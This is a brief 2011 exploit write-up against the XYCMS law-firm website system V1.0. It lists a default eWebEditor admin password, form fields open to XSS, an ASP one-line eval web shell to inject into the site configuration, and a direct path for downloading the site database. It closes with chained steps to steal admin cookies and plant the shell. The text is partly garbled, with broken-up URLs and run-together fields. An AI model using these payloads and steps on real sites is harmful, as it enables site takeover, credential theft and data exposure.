######################################## # XYCMS law firm website construction system V1.0 # http://www.bkjia.com/ym/201102/26348.html # B0mbErM @ n; 2011-2-18 ####################################### ###
############## EWebEditor ############### http: // 127.0.0.1: 99/system/xyeWebEditor/admin/login. aspUser = XY2010 Pass = XY2010
################## XSS ################# http: // 127.0.0.1: 99/online. aspQq: [XSS] Mail: [XSS] Photo: [XSS] Contents: [XSS]
################## Eval ################# http: // 127.0.0.1: 99/system/admin_setup.aspWebName: <% eval request ("pass") %> http: // 127.0.0.1: 99/inc/config. asp
################## MDB ################# http: // 127.0.0.1: 99/xydata/xycms. mdb
################# Hacking ################# 1: eWebEditor
2: XSS + Eval (1) authentic title and name (2) Insert XSS to get background path and cookie (3) Eval
3: MDB + Eval (1) MDB (2) Eval
4: XSS + MDB + Eval (1) MDB (2) XSS-authentic title and name writing (3) insert XSS to obtain background path (4) Eval